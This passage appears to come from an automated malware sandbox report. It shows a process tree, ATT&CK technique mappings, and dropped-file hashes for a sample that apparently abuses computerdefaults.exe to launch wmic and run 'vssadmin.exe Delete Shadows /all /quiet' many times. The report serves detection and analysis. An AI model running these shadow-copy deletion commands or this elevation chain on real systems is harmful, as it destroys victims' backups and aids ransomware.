- Process spawned unexpected child process
- Interacts with shadow copies
PID:5160

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5556
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4120
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:888

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5724
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5608
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5940

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5564

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5628

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:432

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5784
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5656
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4588

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4292
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5560
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6140

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5984

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5932
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5224
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6016

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4120
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5584
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5356

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1140

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5528

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4888

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:840

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5816
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2472
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4860

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4088

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:888
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5244
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5216

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5720

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5240

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1612

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5832
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4372
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5388

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5288
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5548
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5588

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5596

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5468

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4588

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3204
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4596
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3936

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5684
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6060
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5916

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3944

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f426165d1e5f7df1b7a3758c306cd4ae

SHA1
59ef728fbbb5c4197600f61daec48556fec651c1

SHA256
b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

SHA512
8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6960857d16aadfa79d36df8ebbf0e423

SHA1
e1db43bd478274366621a8c6497e270d46c6ed4f

SHA256
f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

SHA512
6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8fc22e4afc5e9f71ff7265eb03d50a60

SHA1
b8be419517a3a3e9f601124d95ab2498a1872cab

SHA256
fe4632ea176cfcd9dc78fd5041ed9b91161ed2a4c481c2de14f77e7c497a6108

SHA512
b6eed8856d01e121b83535bac2ff77008cd6a5abbcf1ee6b571d287b78620c76360a97773063079e3e9601b5e92d2349439cbaa4566197ffa4e50aa78e280dc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5d560afd220210129fb7deb15832c9ad

SHA1
73899c2a58e142f7c54b96744fa3ebffb769fc95

SHA256
b51be68d85723c21ebd6cc335c566e3df120bc661034602fce8287fde2fd1992

SHA512
4c71128cbb7c3035d858b92f606d91ffeece1ace1c42d448654398beb0886f4fbede1b83e9904e3775c4dd1f42801fff9f6d2c7c26d4ac7b6d5aa0c1034704b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
587cc7a1964d2d6992220d546fc8583a

SHA1
c4bbc797affad898b4f54d6aa01c2c3b3e63bf0e

SHA256
8f7c71492742522d13dc6190c21ff5bab96a909bb1b74fedc53c1defca0a6b08

SHA512
8526eaace93e07f15d972b2ba8a6acbdb7fa1f3118e3a6a65775c5dbf9369ff64523b0e38c830ba124c417cf4a1ac25b14438fb9723cdc0ccfc87b77ec984926

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1728691642

Filesize
2KB

MD5
e7c419712715eb0303d52114c314f55b

SHA1
78e1d2ad589fbcdc565c697316f56cebd7870893

SHA256
ce393c708a6bd01b2e642ea5f2d1a68ed10dca7b18669b12c078a9e074ec6bdd

SHA512
6d51f1909b2f27cda58800cb73822a38193443c0a6746c0ffe8205b173f3f710b560e271df4d944b353ec695ec67415355efede4784f01513163c0b6b133020d

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1728691642

Filesize
4KB

MD5
a6a93fcdc149c42677c53d8f64c7d603

SHA1
2f29f6414a503815421b88d95609e93a58dc1b5e

SHA256
cd30c5dfeae89cd0cf65cc0554b8a1f48c29bb89e6fa4932a9522bbee4883da6

SHA512
463ecc9ac5fc0e83d8b26bfa9fc5bd8532423221c4db9ef02c583382f851c86cc9f77e56d5c2b365e7611880ab16d5320519087a856d94bf5fb5c60e734618b9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133731652565210743.txt

Filesize
75KB

MD5
57918fe110d36834ebe9be42830ac1e7

SHA1
2dc89542aeccca3ff42204ee08283b20ce757637

SHA256
12f8fd92c295a844e81e30fa6ad6cb7708aa8125742fd35a214595422c89de09

SHA512
5c8c8d8865aed76757f0e13cb394fa5d98770da0393bf33c5bb6ef1405df50d723b1063d2db9c0f6ecfaa682ec7d153db449d41e35c9d19f37a544dbd6a20c21

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

Filesize
7KB

MD5
9ad7bc16417265509f98b1880af091c7

SHA1
35c35aab32563166b3cee8f2c708b1e968d263d2

SHA256
ab9e0d505f0cc73f4d28d2e6c6b317540fe5fdc5181b6fd30b863d2e2f67dfd8

SHA512
9cc7a9954b7920f65c69cdc13ee51e80bece1059b28fe87f1920ba99888732b606b6838d1bb0870500f2b598be4e9c8bae57a3db7ea6b630d5c65aee0c81cb5d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

Filesize
3KB

MD5
cfba52d2b6fb75d013bd3d012ec3995a

SHA1
aa061f7cf6abc6055e1fa745c309f6da6fea1b7a

SHA256
6e7c8253a0b0c2eefdd879ab3c373191639528114caeda0610d7ebdf3a4b117a

SHA512
a8724d6121a05eb0529f1519c0334742bbc4e5c9847c9f9fae68c5d9b8cf797a50f93745b72fe1e37d34ceaef3284aae7d39a64a6460add732003fac9c0eb6aa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
8KB

MD5
caa3d6336f264f9ad210f6f1f94b1105

SHA1
12354ebac9042b1ff87953142c560839b0f0dc06

SHA256
7eeb0de41e33fc12b53e1d97f75dca07b17d5c5c947e9f69acda1ad880abea42

SHA512
3ddc888ef470c687087419d5598446a2ac7d4960aef81d4c372c76237fbf5fd051a2e06fb8ca4ce7b438e5d1a3d634d0d0bd9798ec0b097e9d17f7be1aff8643

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
cbea34f238df71471c63ef4c2773951c

SHA1
53fdad805acdff4c08b1c05b5d93339a5b862e94

SHA256
26e648be06ff9bc533be323dad5bad6de38fdf9c6df72ad1b408c5d08b976d5f

SHA512
ef8215dd17c16c724a7900c3cf9a7ae00cad9cf8bf8f5415916dcf36d97264011a226a6f95e3f42a75d98904c82a64d2453295fd1bb09965d69d3c22dd442813

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/2164-7-0x000001DAA7AE0000-0x000001DAA7AE1000-memory.dmp

Filesize
4KB

Download
memory/2164-8-0x000001DAA7B20000-0x000001DAA7B21000-memory.dmp

Filesize
4KB

Download
memory/2164-4-0x000001DAA7AB0000-0x000001DAA7AB1000-memory.dmp

Filesize
4KB

Download
memory/2164-6-0x000001DAA7AD0000-0x000001DAA7AD1000-memory.dmp

Filesize
4KB

Download
memory/2164-2-0x000001DAA7A90000-0x000001DAA7A91000-memory.dmp

Filesize
4KB

Download
memory/2164-3-0x000001DAA7AA0000-0x000001DAA7AA1000-memory.dmp

Filesize
4KB

Download
memory/2164-0-0x000001DAA7540000-0x000001DAA7A7E000-memory.dmp

Filesize
5.2MB

Download
memory/2164-5-0x000001DAA7AC0000-0x000001DAA7AC1000-memory.dmp

Filesize
4KB

Download
memory/2164-1-0x000001DAA7A80000-0x000001DAA7A81000-memory.dmp

Filesize
4KB

Download
memory/2164-9-0x000001DAA7B30000-0x000001DAA7B31000-memory.dmp

Filesize
4KB

Download
memory/2164-11-0x000001DAA7C10000-0x000001DAA7C11000-memory.dmp

Filesize
4KB

Download
memory/2164-10-0x000001DAA7B50000-0x000001DAA7B51000-memory.dmp

Filesize
4KB

Download
memory/2616-12-0x000001D6EF800000-0x000001D6EF805000-memory.dmp

Filesize
20KB

Download
memory/3920-339-0x000001C053D00000-0x000001C053D01000-memory.dmp

Filesize
4KB

Download
memory/3920-338-0x000001C054080000-0x000001C054088000-memory.dmp

Filesize
32KB

Download